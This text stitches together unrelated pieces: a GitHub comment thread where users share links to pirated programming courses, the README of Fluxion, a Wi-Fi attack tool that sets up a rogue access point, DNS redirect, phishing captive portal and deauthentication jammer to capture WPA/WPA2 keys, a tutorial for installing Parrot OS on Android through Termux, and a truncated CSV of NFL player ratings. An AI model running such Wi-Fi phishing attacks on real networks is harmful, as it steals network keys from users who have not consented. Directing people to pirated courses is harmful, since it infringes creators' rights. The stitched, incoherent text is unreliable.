https://drive.google.com/open?id=1oYYdPp4MVVk7ZzZL6rLepFe33IjXtkqj Can you share part 1 and 3? https://vminhsang.name.vn/category/it-courses/codewithmosh/ this link includes almost all mosh courses Yes. Java mastery and Data Structures 1, 2, 3 are available in this site. free download. You are a saviour .. Altho i feel bad i cant really buy the course... its really good @msdyn95 msdyn95 commented 25 days ago • Please give me the torrent file or link to download https://codewithmosh.com/p/design-patterns https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-1/ https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-2/ @K-wachira K-wachira commented 23 days ago This one kindly. https://www.udemy.com/course/flutter-build-a-complex-android-and-ios-apps-using-firestore/ Hey did you find this one? @edward-teixeira edward-teixeira commented 22 days ago Please give me the torrent file or link to download https://codewithmosh.com/p/design-patterns https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-1/ https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-2/ Did you find those? @msdyn95 msdyn95 commented 21 days ago Please give me the torrent file or link to download https://codewithmosh.com/p/design-patterns https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-1/ https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-2/ Did you find those? unfortunately not. @edward-teixeira edward-teixeira commented 20 days ago Please give me the torrent file or link to download https://codewithmosh.com/p/design-patterns https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-1/ https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-2/ Did you find those? unfortunately not. Found it ! https://vminhsang.name.vn/category/it-courses/codewithmosh/ @ZainA14 ZainA14 commented 16 days ago • Can someone please link me to this mosh course for torrent or direct download link https://codewithmosh.com/p/the-ultimate-full-stack-net-developer-bundle @khushiigupta khushiigupta commented 9 days ago Can any one please provide me link for jenkins so that I can learn as al as possible to join this conversation on GitHub. Already have an account? Sign in to comment © 2020 GitHub, Inc. Terms Privacy Security Status Help Contact GitHub Pricing API Training Blog About
hackcrypto
Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues. If you need quick help, fluxion is also avaible on gitter. You can talk with us on Gitter or on Discord. Installation Read here before you do the following steps. Download the latest revision git clone --recursive git@github.com:FluxionNetwork/fluxion.git Switch to tool's directory cd fluxion Run fluxion (missing dependencies will be auto-installed) ./fluxion.sh Fluxion is also available in arch cd bin/arch makepkg or using the blackarch repo pacman -S fluxion scroll Changelog Fluxion gets weekly updates with new features, improvements, and bugfixes. Be sure to check out the changelog here. :octocat: How to contribute All contributions are welcome! Code, documentation, graphics, or even design suggestions are welcome; use GitHub to its fullest. Submit pull requests, contribute tutorials or other wiki content -- whatever you have to offer, it'll be appreciated but please follow the style guide. book How it works Scan for a target wireless network. Launch the Handshake Snooper attack. Capture a handshake (necessary for password verification). Launch Captive Portal attack. Spawns a rogue (fake) AP, imitating the original access point. Spawns a DNS server, redirecting all requests to the attacker's host running the captive portal. Spawns a web server, serving the captive portal which prompts users for their WPA/WPA2 key. Spawns a jammer, deauthenticating all clients from original AP and lureing them to the rogue AP. All authentication attempts at the captive portal are checked against the handshake file captured earlier. The attack will automatically terminate once a correct key has been submitted. The key will be logged and clients will be allowed to reconnect to the target access point. For a guide to the Captive Portal attack, read the Captive Portal attack guide exclamation Requirements A Linux-based operating system. We recommend Kali Linux 2 or Kali rolling. Kali 2 & rolling support the latest aircrack-ng versions. An external wifi card is recommended. Related work For development I use vim and tmux. Here are my dotfiles :octocat: Credits l3op - contributor dlinkproto - contributor vk496 - developer of linset Derv82 - @Wifite/2 Princeofguilty - @webpages and @buteforce Photos for wiki @http://www.kalitutorials.net Ons Ali @wallpaper PappleTec @sites MPX4132 - Fluxion V3 Disclaimer Authors do not own the logos under the /attacks/Captive Portal/sites/ directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. The usage of Fluxion for attacking infrastructures without prior mutual consent could be considered an illegal activity, and is highly discouraged by its authors/developers. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program. Note Beware of sites pretending to be related with the Fluxion Project. These may be delivering malware. Fluxion DOES NOT WORK on Linux Subsystem For Windows 10, because the subsystem doesn't allow access to network interfaces. Any Issue regarding the same would be Closed Immediately Links Fluxion website: https://fluxionnetwork.github.io/fluxion/ Discord: https://discordapp.com/invite/G43gptk Gitter: https://gitter.im/FluxionNetwork/Lobby
GBHacker-com
Hey, Today I’m going to tell you about How you can Install Parrot OS on Android. Parrot Os is the most popular and wide used for Hacking. It works similar to the Kali Linux and it also currently competitive with the Kali Right Now. You need good Hardware specs for using the Kali Linux but on Parrot, it runs on very fewer Hardware specs and gives you the faster response on your task. So, Lets Start… You need these minimum Requirements to Install it: At least 1 GB RAM 2 GB Free Space on Your Phone Storage Android OS up to 5.0 Lollipop Need to spend time 30 minute These Three Apps are Needed to be Installed on Your Phone: Now, Follow the steps of installing the Parrot OS on Android 1. Open the Termux app and Update the Installed Packages by typing the command: apt-get update 2. Upgrade the Previous Installed Packages typing the command and Press Y if ask: apt-get upgrade 3. Now, Open the AnLinux app Choose your distro Parrot Security OS in-app 4. You’ll see a Copy button there… Click on it. 5. Now, After Copied Click on the Launch button. 6. It will Open You the Termux app Paste the Copied command there then hit Enter. 7. Now, wait until the installation Finish. 8. Launch the Parrot OS using the command: ./start-parrot.sh Here You have Done the Installation In Parrot OS. Install the Desktop Environment In Parrot OS So, you can easy to use the GUI version of Parrot OS… First of all, you have to Open the AnLinux app and then click on Menu. Click on Desktop Environment Choose your Distro: Parrot Security OS Now Choose the Desktop Environment: Xfce4 (Recommended) Click on Copy and Paste the command in the Termux app while you are running the Parrot OS. After type: Y and hit Enter (if ask) wait until the Downloading gets Finish (takes 15 to 20min) After Finish it will ask You for the Keyword Layout Just Press 1 and hit Enter (for English US) Now, It will tell you to create a password choose your Password (You won’t be able to see the password) It will tell you to Verify Just Re-type the Password and hit Enter All set… Just launch the VNC Viewer app and add a New Connection. In Address type: localhost:5901 In Name Choose any random name of your Connection label and Create After Created Click on it. Now, it will ask you for the Password Type the Password which you have chosen before and hit OK That’s it for today… If you have any questions and queries just ask them in the comment below. Note: If it won’t ask you to choose Keyboard Layout or Password then you have to reinstall the Termux app and Follow the installation process again. If you like this .. Please Encourage me!!!!
GuilhermeSAlves
Baltimore Ravens,BAL QB,Joe Flacco,32,1986,52,63,91,95,80,40,19.900000,2 QB,Ryan Mallett,29,1989,61,45,76,89,74,37,1.900000,1 RB,Terrance West,26,1992,79,75,81,75,88,77,1.100000,1 RB,Kenneth Dixon,23,1995,78,60,76,75,87,80,0.500000,3 RB,Javorius Allen,26,1992,60,60,73,71,88,74,0.500000,2 RB,Danny Woodhead,32,1986,53,70,68,67,88,74,2.300000,3 RB,Alex Collins,23,1995,98,60,79,60,88,76,0.400000,3 RB,Maxx Williams,23,1995,88,45,70,61,80,70,0.800000,2 WR,Jeremy Maclin,29,1989,83,68,71,83,92,76,5.000000,2 WR,Mike Wallace,31,1987,52,75,79,73,92,72,5.600000,1 WR,Breshad Perriman,24,1994,73,54,63,63,95,76,2.100000,2 WR,Michael Campanaro,26,1992,68,60,70,68,90,69,0.900000,1 WR,Benjamin Watson,37,1981,62,68,75,73,80,65,2.300000,1 WR,Vince Mayle,26,1992,70,40,73,63,83,74,0.300000,1 WR,Chris Moore,24,1994,93,40,75,62,90,65,0.600000,3 WR,Nick Boyle,24,1994,83,60,79,68,72,53,0.400000,2 OL,Marshal Yanda,33,1985,57,97,87,87,94,76,5.900000,2 OL,Ryan Jensen,26,1992,74,62,77,81,92,60,1.100000,1 OL,Jermaine Eluemunor,23,1995,90,40,83,85,74,60,0.500000,4 OL,Austin Howard,30,1988,68,62,71,76,91,62,3.300000,3 OL,Ronnie Stanley,23,1995,79,73,77,76,89,62,5.200000,3 OL,Luke Bowanko,26,1992,70,45,68,75,83,60,0.400000,1 OL,Matt Skura,24,1994,71,54,76,75,74,60,0.300000,2 OL,James Hurst,26,1992,69,64,67,63,73,60,0.900000,1 OL,Levi Spurger,27,2012,83,67,90,61,62,59,0.500000,1 OL,Morgan Cox,31,1987,75,60,70,45,51,50,0.700000,4 K,Justin Tucker,28,1990,72,57,71,97,98,57,3.600000,3 K,Sam Koch,35,1983,40,59,65,83,93,59,2.500000,4 S,Eric Weddle,32,1986,81,87,85,79,85,79,5.200000,3 S,Tony Jefferson,25,1993,81,83,71,79,84,77,6.900000,4 S,Lardarius Webb,32,1986,61,62,76,79,90,53,1.600000,3 S,Anthony Levine Sr.,30,1988,59,62,70,79,86,59,1.000000,3 S,Chuck Clark,22,1996,79,40,79,70,88,66,0.400000,4 CB,Jimmy Smith,29,1989,66,77,79,82,89,69,9.500000,3 CB,Marlon Humphrey,21,1997,81,57,77,77,92,67,2.900000,4 CB,Maurice Canady,23,1995,88,40,75,74,89,63,0.400000,3 CB,Brandon Carr,31,1987,62,65,81,77,87,60,4.300000,4 CB,Tavon Young,23,1995,74,61,79,79,90,47,0.600000,3 CB,Jaylen Hill,23,1995,87,40,65,71,84,44,0.300000,3 LB,CJ Mosley,25,1993,69,73,79,87,84,77,2.900000,2 LB,Terrell Suggs,35,1983,66,71,85,83,94,71,5.300000,2 LB,Kamalei Correa,23,1995,98,56,76,68,82,74,1.300000,3 LB,Steven Johnson,29,1989,83,50,73,68,77,69,0.500000,1 LB,Patrick Onwuasor,25,1993,85,58,77,64,80,74,0.300000,1 LB,Za'Darius Smith,25,1993,84,60,76,65,82,68,0.500000,2 LB,Matt Judon,25,1993,84,45,70,65,86,68,0.400000,3 LB,Tyus Bowser,22,1996,98,45,76,64,80,72,1.200000,4 LB,Tim Williams,24,1994,96,45,71,61,80,71,0.600000,4 DL,Brandon Williams,28,1990,64,81,65,93,95,70,8.100000,5 DL,Michael Pierce,25,1993,87,73,71,89,92,74,0.300000,2 DL,Patrick Ricard,23,1995,69,45,68,81,88,72,0.300000,3 DL,Willie Henry,23,1995,90,54,71,75,87,76,0.500000,3 DL,Carl Davis,25,1993,78,62,63,77,87,67,0.600000,2 DL,Chris Wormley,24,1994,94,45,75,70,83,76,0.700000,4 DL,Bronson Kaufusi,26,1992,60,45,79,67,82,72,0.700000,3 DL,Brent Urban,26,1992,77,60,62,64,81,70,0.400000,1 END_PLAYERS Cincinnati Bengals,CIN QB,Andy Dalton,30,1988,70,68,89,85,83,40,11.500000,4 QB,AJ McCarron,27,1991,70,61,85,75,80,40,0.400000,1 RB,Jeremy Hill,25,1993,86,68,79,76,88,79,0.700000,1 RB,Joe Mixon,21,1997,84,54,83,75,91,79,1.200000,4 RB,Giovani Bernard,26,1992,90,67,68,70,91,79,3.100000,3 RB,Cethan Carter,24,1994,79,35,68,59,83,62,0.300000,3 RB,Ryan Hewitt,26,1992,87,58,77,57,77,59,1.400000,3 WR,AJ Green,29,1989,68,97,87,91,91,82,9.400000,3 WR,Tyler Eifert,27,1991,80,77,73,79,84,70,3.000000,1 WR,Brandon LaFell,31,1987,68,71,79,77,86,72,2.800000,2 WR,John Ross,22,1996,69,58,75,70,98,69,4.300000,4 WR,Tyler Boyd,23,1995,67,61,73,75,88,59,0.900000,3 WR,Josh Malone,21,1997,96,45,75,70,92,59,0.600000,4 WR,Alex Erickson,25,1993,80,35,75,65,88,66,0.300000,2 WR,Cody Core,23,1995,74,45,73,65,90,65,0.400000,3 WR,Tyler Kroft,25,1993,85,56,64,67,81,66,0.600000,2 WR,CJ Uzomah,24,1994,80,45,75,62,85,67,0.400000,2 OL,Russell Bodine,25,1993,94,68,79,95,73,59,0.700000,1 OL,Andre Smith,30,1988,87,52,75,91,75,60,3.000000,1 OL,Clint Boling,28,1990,73,63,85,76,74,68,3.600000,3 OL,Christian Westerman,24,1994,69,40,76,77,77,60,0.400000,3 OL,Trey Hopkins,25,1993,75,56,70,76,73,59,0.300000,2 OL,TJ Johnson,27,1991,90,45,71,75,73,61,1.200000,2 OL,Alex Redmond,22,1996,84,40,63,75,72,58,0.300000,2 OL,Jake Fisher,24,1994,92,62,70,70,73,60,0.900000,2 OL,Cedric Ogbuehi,25,1993,78,61,62,68,73,60,2.200000,2 OL,Eric Winston,34,1984,75,60,77,68,75,60,0.600000,1 OL,Clark Harris,33,1985,82,54,71,60,54,45,0.600000,1 K,Randy Bullock,28,1990,73,40,62,89,82,40,0.500000,2 K,Kevin Huber,32,1986,75,40,70,77,75,40,2.000000,1 K,Marshall Koehn,25,1993,68,35,54,35,88,35,0.300000,2 S,Shawn Williams,26,1992,87,61,81,79,90,79,2.800000,4 S,KeiVarae Russell,24,1994,84,40,75,76,89,63,0.500000,3 S,Clayton Fejedelem,24,1994,88,45,83,74,87,66,0.400000,3 S,George Iloka,27,1991,62,68,77,79,85,57,4.100000,4 CB,Darqueze Dennard,26,1992,61,60,79,79,92,67,1.900000,1 CB,Josh Shaw,25,1993,94,45,65,75,90,63,0.500000,2 CB,William Jackson III,25,1993,85,45,75,79,92,40,2.300000,3 CB,Adam Jones,34,1984,69,64,76,79,87,44,5.000000,2 CB,Dre Kirkpatrick,28,1990,87,67,73,77,88,40,7.400000,5 CB,Patrick Crump,30,2009,58,87,58,58,58,65,0.500000,1 LB,Vontaze Burfict,27,1991,61,81,91,81,88,74,3.500000,1 LB,Vincent Rey,30,1988,65,67,79,81,84,72,2.200000,2 LB,Nick Vigil,24,1994,67,45,79,76,80,69,0.600000,3 LB,Hardy Nickerson,23,1995,92,40,77,75,82,66,0.300000,3 LB,Kevin Minter,27,1991,85,75,75,71,84,75,4.000000,1 LB,Carl Lawson,22,1996,88,57,67,65,87,68,0.600000,4 LB,Jordan Evans,22,1996,70,40,77,62,79,74,0.400000,4 DL,Andrew Billings,22,1996,88,40,70,83,87,70,0.500000,3 DL,Geno Atkins,29,1989,65,87,73,81,90,75,8.500000,2 DL,Pat Sims,32,1986,75,61,71,79,88,69,0.700000,1 DL,Jordan Willis,22,1996,91,45,83,73,87,79,0.700000,4 DL,Chris Smith,25,1993,81,40,71,73,85,76,0.400000,1 DL,Ryan Glasgow,24,1994,68,54,70,77,87,65,0.500000,4 DL,Carlos Dunlap,28,1990,60,71,68,64,84,77,5.100000,2 DL,Michael Johnson,30,1988,61,61,70,60,80,79,3.800000,2 END_PLAYERS Cleveland Browns,CLE QB,DeShone Kizer,21,1997,79,45,89,91,75,68,1.000000,4 QB,Kevin Hogan,25,1993,82,60,87,75,77,59,0.300000,1 QB,Cody Kessler,24,1994,93,50,79,79,76,37,0.600000,3 RB,Isaiah Crowell,24,1994,91,63,76,77,89,79,1.700000,1 RB,Duke Johnson,24,1994,78,65,70,67,90,79,0.600000,2 RB,Darius Jackson,24,1994,73,35,77,70,92,71,0.400000,3 RB,Dan Vitale,24,1994,94,45,77,60,85,70,0.300000,2 RB,Matt Dayes,22,1996,80,40,71,59,84,65,0.400000,4 WR,Kenny Britt,29,1989,90,64,79,73,86,76,6.100000,4 WR,Corey Coleman,23,1995,95,61,76,70,93,70,2.900000,3 WR,David Njoku,21,1997,81,45,75,68,85,71,2.300000,4 WR,Ricardo Louis,23,1995,90,57,77,67,91,66,0.500000,3 WR,Sammie Coates,24,1994,74,45,77,62,91,74,0.600000,2 WR,Seth DeValve,24,1994,75,57,75,68,83,68,0.500000,3 WR,Rashard Higgins,23,1995,74,45,79,68,85,65,0.400000,3 WR,Kasen Williams,25,1993,82,45,62,65,85,63,0.300000,1 WR,Randall Telfer,25,1993,67,50,64,61,78,67,0.400000,2 OL,Joe Thomas,33,1985,77,97,95,87,86,91,7.200000,2 OL,Kevin Zeitler,27,1991,60,71,85,83,75,67,9.000000,5 OL,Zach Banner,24,1994,84,45,67,81,81,60,0.500000,4 OL,Joel Bitonio,26,1992,69,75,83,75,77,79,5.400000,6 OL,JC Tretter,26,1992,82,63,75,79,74,60,4.400000,3 OL,Shon Coleman,26,1992,66,50,70,75,84,60,0.600000,3 OL,Spencer Drango,25,1993,91,60,81,70,79,61,0.400000,3 OL,Marcus Martin,24,1994,88,62,71,68,73,59,1.100000,1 OL,Austin Reiter,26,1992,94,40,73,62,79,59,0.300000,1 OL,Charley Hughlett,27,1991,62,45,68,60,70,52,0.700000,6 K,Zane Gonzalez,22,1996,97,40,64,93,78,40,0.400000,4 K,Britton Colquitt,32,1986,61,45,68,77,81,45,1.800000,4 S,Jabrill Peppers,22,1996,90,54,79,77,90,76,2.500000,4 S,Derrick Kindred,24,1994,72,64,79,79,89,74,0.500000,3 S,Kai Nacua,22,1996,92,40,77,75,88,59,0.300000,1 S,Derron Smith,25,1993,96,45,68,67,85,69,0.400000,2 CB,Jason McCourty,30,1988,78,73,68,80,92,69,2.300000,2 CB,Briean Boddy-Calhoun,24,1994,79,70,73,79,90,44,0.300000,2 CB,Jamar Taylor,27,1991,77,60,79,77,92,46,3.000000,3 CB,Howard Wilson,22,1996,72,40,75,72,87,55,0.600000,4 CB,Michael Jordan,25,1993,88,45,71,74,85,43,0.300000,2 CB,Darius Hillary,24,1994,95,35,68,68,87,40,0.300000,2 LB,Christian Kirksey,25,1993,76,71,73,85,82,77,5.500000,5 LB,Jamie Collins,28,1990,69,64,81,76,83,77,8.600000,4 LB,Tank Carder,28,1990,76,45,81,70,77,71,0.900000,1 LB,James Burgess,23,1995,70,45,73,67,83,67,0.300000,2 LB,Joe Schobert,24,1994,82,59,81,59,77,71,0.600000,3 LB,Josh Keyes,24,1994,98,40,76,40,77,72,0.400000,1 DL,Myles Garrett,22,1996,90,57,71,93,89,79,7.900000,4 DL,Danny Shelton,24,1994,72,71,73,91,95,69,2.900000,2 DL,Caleb Brantley,23,1995,98,40,71,79,88,69,0.400000,4 DL,Larry Ogunjobi,23,1995,82,57,76,77,86,74,0.800000,4 DL,Trevon Coley,23,1995,73,45,71,73,86,77,0.300000,2 DL,Jamie Meder,26,1992,79,61,81,76,83,68,0.400000,1 DL,TY McGill,25,1993,70,54,76,73,85,70,0.300000,1 DL,Emmanuel Ogbah,24,1994,75,45,77,62,82,79,1.500000,3 DL,Carl Nassib,24,1994,94,50,75,60,76,72,0.700000,3 DL,Nate Orchard,24,1994,93,56,77,61,73,70,0.900000,2 END_PLAYERS Pittsburgh Steelers,PIT QB,Ben Roethlisbergr,35,1983,67,73,91,91,85,63,17.100000,3 QB,Joshua Dobbs,22,1996,79,50,76,83,76,76,0.600000,4 QB,Landry Jones,28,1990,80,40,79,83,77,37,1.600000,2 RB,Le'Veon Bell,25,1993,86,76,76,91,90,91,7.600000,1 RB,Terrell Watson,24,1994,92,52,75,67,87,79,0.300000,1 RB,James Conner,22,1996,71,52,76,76,85,71,0.600000,4 RB,Roosevelt Nix,25,1993,78,60,76,58,79,65,0.400000,1 WR,Antonio Brown,29,1989,74,97,85,97,92,80,12.600000,5 WR,Eli Rogers,25,1993,84,63,73,77,88,71,0.300000,1 WR,JuJu Smith-Schuste,21,1997,81,60,85,73,88,74,0.800000,4 WR,Martavis Bryant,26,1992,66,67,76,70,93,71,0.500000,1 WR,Darrius Heyward-Bey,30,1988,71,67,75,64,91,74,0.900000,2 WR,Justin Hunter,26,1992,96,50,67,61,90,70,0.600000,1 WR,Jesse James,23,1995,83,64,73,71,83,57,0.400000,2 WR,Vance McDonald,27,1991,90,50,70,64,83,65,4.200000,5 WR,Xavier Grimble,25,1993,92,52,68,61,75,57,0.300000,1 OL,David DeCastro,27,1991,88,89,85,89,96,71,8.600000,5 OL,Matt Feiler,25,1993,67,40,73,89,79,59,0.300000,1 OL,Marcus Gilbert,29,1989,77,81,75,83,74,75,4.800000,3 OL,Maurkice Pouncey,28,1990,87,85,73,83,77,60,7.100000,3 OL,Ramon Foster,31,1987,78,89,71,77,72,73,2.600000,2 OL,Alejandro Villanueva,29,1989,84,76,76,75,81,62,4.800000,4 OL,BJ Finney,26,1992,98,57,77,71,75,70,0.300000,1 OL,Jerald Hawkins,24,1994,93,40,79,67,80,61,0.500000,3 OL,Chris Hubbard,26,1992,71,54,71,62,75,59,1.100000,1 OL,Kameron Canaday,25,1993,85,40,76,56,48,60,0.300000,1 K,Chris Boswell,26,1992,74,54,65,85,91,54,0.400000,1 K,Jordan Berry,26,1992,89,45,65,83,83,45,0.300000,1 S,JJ Wilcox,26,1992,60,60,75,77,88,75,2.000000,2 S,Sean Davis,24,1994,70,60,79,79,90,60,0.800000,3 S,Mike Mitchell,30,1988,79,63,83,77,87,66,3.700000,2 S,Robert Golden,27,1991,74,57,76,76,87,62,1.300000,2 CB,William Gay,32,1986,51,75,81,77,88,69,2.000000,2 CB,Mike Hilton,23,1995,97,63,71,79,87,59,0.300000,1 CB,Joe Haden,28,1990,80,65,87,84,89,44,6.800000,3 CB,Artie Burns,22,1996,99,67,71,79,91,43,2.300000,3 CB,Coty Sensabaugh,29,1989,82,57,76,77,90,37,0.900000,2 CB,Cameron Sutton,22,1996,67,45,76,74,88,43,0.600000,4 CB,Brian Allen,24,1994,85,40,75,72,91,40,0.400000,4 LB,Ryan Shazier,25,1993,68,73,71,75,88,84,3.100000,2 LB,TJ Watt,23,1995,85,54,75,75,84,74,2.200000,4 LB,James Harrison,39,1979,70,70,81,73,95,68,1.300000,2 LB,Vince Williams,28,1990,65,64,71,75,83,71,1.600000,2 LB,LJ Fort,27,1991,75,45,75,71,82,70,0.300000,1 LB,Bud Dupree,24,1994,91,54,75,68,80,76,2.200000,2 LB,Tyler Matakevich,25,1993,67,40,83,70,84,68,0.400000,3 LB,Keion Adams,22,1996,86,40,77,61,83,68,0.400000,4 LB,Anthony Chickillo,25,1993,79,50,79,61,81,68,0.400000,1 LB,Arthur Moats,29,1989,82,52,71,61,75,69,2.000000,1 DL,Stephon Tuitt,24,1994,79,75,65,83,91,72,1.000000,1 DL,Cameron Heyward,28,1990,64,81,79,81,92,75,7.700000,4 DL,Javon Hargrave,24,1994,81,62,77,73,85,76,0.600000,3 DL,Tyson Alualu,30,1988,64,67,75,75,87,72,2.300000,2 DL,Daniel McCullers,25,1993,94,60,65,77,88,60,0.400000,1 DL,Leterrius Walton,25,1993,81,60,70,73,84,68,0.400000,2 DL,Casey Muehl,29,2010,54,84,70,67,65,68,0.500000,1 DL,Alton Petanick,24,2015,80,78,63,57,66,60,0.500000,1 END_PLAYERS Buffalo Bills,BUF QB,Tyrod Taylor,28,1990,80,71,79,83,81,70,11.700000,2 QB,Nathan Peterman,23,1995,98,52,81,83,76,53,0.400000,4 QB,Joe Webb,31,1987,77,54,70,79,68,76,0.600000,1 RB,LeSean McCoy,29,1989,63,77,73,67,90,77,6.600000,3 RB,Travaris Cadet,28,1990,59,54,73,62,87,76,0.500000,1 RB,Mike Tolbert,32,1986,42,73,77,71,77,69,0.700000,1 RB,Patrick DiMarco,28,1990,81,67,81,60,74,65,1.600000,4 WR,Zay Jones,22,1996,92,57,87,77,90,74,1.500000,4 WR,Kelvin Benjamin,26,1992,72,77,75,79,86,74,2.600000,2 WR,Charles Clay,28,1990,86,70,85,76,83,72,6.000000,3 WR,Jordan Matthews,25,1993,80,75,83,68,90,72,1.100000,1 WR,Andre Holmes,29,1989,77,61,68,68,87,69,1.400000,3 WR,Deonte Thompson,28,1990,75,58,65,64,92,69,0.600000,1 WR,Brandon Tate,30,1988,74,50,71,60,88,77,0.700000,1 WR,Jeremy Butler,26,1992,71,40,75,64,86,65,0.400000,1 WR,Logan Thomas,26,1992,68,40,79,60,84,70,0.500000,1 WR,Nick O'Leary,25,1993,92,54,77,71,75,53,0.300000,1 WR,Khari Lee,25,1993,84,45,75,60,76,65,0.400000,2 OL,Richie Incognito,34,1984,71,85,85,89,86,75,4.000000,2 OL,Cordy Glenn,28,1990,74,79,75,87,72,61,9.500000,4 OL,Vladimir Ducasse,30,1988,67,63,76,85,74,61,0.800000,3 OL,Dion Dawkins,23,1995,98,54,79,81,78,60,0.800000,4 OL,John Miller,24,1994,82,68,71,75,73,68,0.600000,2 OL,Eric Wood,31,1987,79,77,76,77,75,59,6.800000,3 OL,Ryan Groy,27,1991,79,60,70,75,77,61,1.600000,2 OL,Conor McDermott,25,1993,94,40,75,71,74,60,0.400000,4 OL,Jordan Mills,27,1991,74,61,75,71,72,60,1.300000,2 OL,Seantrel Henderson,25,1993,79,60,60,70,77,56,0.500000,1 OL,Reid Ferguson,23,1995,97,35,76,35,46,60,0.300000,2 K,Steven Hauschka,32,1986,56,40,67,93,86,40,2.500000,3 K,Colton Schmidt,27,1991,87,40,68,79,76,40,1.000000,2 S,Micah Hyde,27,1991,80,70,75,77,88,69,4.800000,5 S,Shamarko Thomas,26,1992,69,45,75,77,90,66,0.500000,1 S,Trae Elston,23,1995,73,35,70,69,89,68,0.300000,2 S,Colt Anderson,32,1986,62,58,76,72,85,59,0.700000,1 S,Jordan Poyer,26,1992,60,75,73,79,87,40,2.600000,4 CB,Tre'Davious White,22,1996,72,62,79,79,90,66,2.400000,4 CB,EJ Gaines,25,1993,75,70,75,79,89,57,0.500000,1 CB,Shareece Wright,30,1988,64,58,76,77,90,47,0.500000,1 CB,Leonard Johnson,27,1991,78,57,77,76,86,46,0.600000,1 CB,Lafayette Pitts,25,1993,79,40,76,72,90,40,0.300000,1 CB,Rolando Amanza,29,2010,77,65,91,56,64,66,0.500000,1 LB,Lorenzo Alexander,34,1984,65,73,76,70,86,76,2.200000,2 LB,Matt Milano,23,1995,99,40,83,70,83,67,0.500000,4 LB,Preston Brown,25,1993,95,68,87,67,84,76,0.700000,1 LB,Tanner Vallejo,23,1995,84,40,70,71,82,67,0.400000,4 LB,Ramon Humber,30,1988,79,60,68,68,76,70,0.600000,1 LB,Deon Lacey,27,1991,63,45,71,60,77,69,0.400000,2 DL,Kyle Williams,34,1984,58,76,73,81,92,71,5.600000,1 DL,Cedric Thornton,29,1989,70,59,68,77,89,70,3.400000,3 DL,Shaq Lawson,23,1995,69,57,70,73,88,79,2.500000,3 DL,Eddie Yarbrough,24,1994,85,45,63,68,83,76,0.300000,1 DL,Jerel Worthy,27,1991,80,54,70,68,86,71,0.400000,1 DL,Jerry Hughes,29,1989,63,70,83,61,81,79,6.500000,3 DL,Adolphus Washington,25,1993,73,52,71,60,82,76,0.600000,3 DL,Ryan Davis,28,1990,75,50,70,60,75,74,0.700000,2 END_PLAYERS Miami Dolphins,MIA QB,Ryan Tannehill,29,1989,70,67,89,83,81,66,14.000000,4 QB,Jay Cutler,34,1984,51,60,65,91,77,37,6.300000,1 QB,David Fales,27,1991,84,40,81,70,79,40,0.400000,1 QB,Matt Moore,33,1985,71,63,83,71,78,37,1.300000,1 RB,Damien Williams,25,1993,75,60,73,68,91,76,1.100000,1 RB,Kenyan Drake,23,1995,73,45,68,60,91,74,0.700000,3 RB,Senorise Perry,26,1992,60,40,71,57,92,70,0.400000,2 RB,MarQueis Gray,28,1990,78,57,73,60,81,70,0.700000,2 WR,Jarvis Landry,25,1993,68,76,83,93,91,80,0.700000,1 WR,DeVante Parker,24,1994,85,76,76,79,91,72,2.700000,2 WR,Kenny Stills,25,1993,72,73,77,75,92,72,6.100000,4 WR,Julius Thomas,29,1989,79,62,70,71,85,74,3.800000,2 WR,Leonte Carroo,23,1995,84,45,76,70,89,65,0.600000,3 WR,Jakeem Grant,25,1993,66,40,71,65,96,67,0.400000,3 WR,Anthony Fasano,33,1985,41,64,77,62,76,59,2.500000,1 OL,Isaac Asiata,25,1993,84,40,85,85,79,61,0.500000,4 OL,Laremy Tunsil,23,1995,95,62,83,77,80,60,3.100000,3 OL,Mike Pouncey,28,1990,64,67,65,77,74,60,6.200000,4 OL,Zach Sterup,25,1993,87,40,73,75,79,60,0.300000,1 OL,Jermon Bushrod,33,1985,65,67,83,76,72,59,2.300000,1 OL,Ja'Wuan James,25,1993,84,71,75,71,73,65,2.900000,2 OL,Sam Young,30,1988,73,59,71,70,81,60,0.700000,1 OL,Jesse Davis,26,1992,75,40,77,71,74,59,0.300000,2 OL,Ted Larsen,30,1988,75,59,77,64,80,60,1.400000,3 OL,Jake Brendel,25,1993,73,35,81,65,74,60,0.300000,1 OL,John Denney,39,1979,71,76,76,60,52,45,0.600000,1 K,Cody Parkey,25,1993,90,40,75,89,81,40,0.400000,1 K,Matt Haack,23,1995,88,40,65,93,77,40,0.300000,3 S,Reshad Jones,29,1989,72,87,71,82,86,80,8.200000,6 S,Nate Allen,30,1988,80,61,68,77,86,66,3.400000,1 S,Michael Thomas,27,1991,70,60,76,77,86,60,1.100000,1 S,TJ McDonald,26,1992,63,62,73,79,86,59,0.200000,5 S,Jordan Lucas,24,1994,90,35,73,71,91,62,0.400000,3 S,Maurice Smith,22,1996,68,40,71,68,85,55,0.300000,3 CB,Alterraun Verner,29,1989,71,52,75,77,86,69,0.600000,1 CB,Xavien Howard,24,1994,90,45,81,77,91,53,1.400000,3 CB,Cordrea Tankersley,24,1994,79,45,85,71,92,63,0.600000,4 CB,Bobby McCain,24,1994,84,63,75,77,89,43,0.400000,2 CB,Walt Aikens,26,1992,89,45,76,75,89,44,0.500000,1 CB,Torry McTyer,22,1996,67,40,71,71,92,40,0.300000,3 LB,Lawrence Timmons,31,1987,65,75,81,75,84,77,5.500000,2 LB,Kiko Alonso,27,1991,71,67,73,76,80,74,5.600000,4 LB,Stephone Anthony,25,1993,83,56,70,71,83,75,1.800000,2 LB,Rey Maualuga,30,1988,82,60,85,73,87,67,0.700000,1 LB,Mike Hull,26,1992,99,56,77,70,87,71,0.400000,1 LB,Chase Allen,24,1994,83,45,77,70,82,71,0.300000,3 DL,Ndamukong 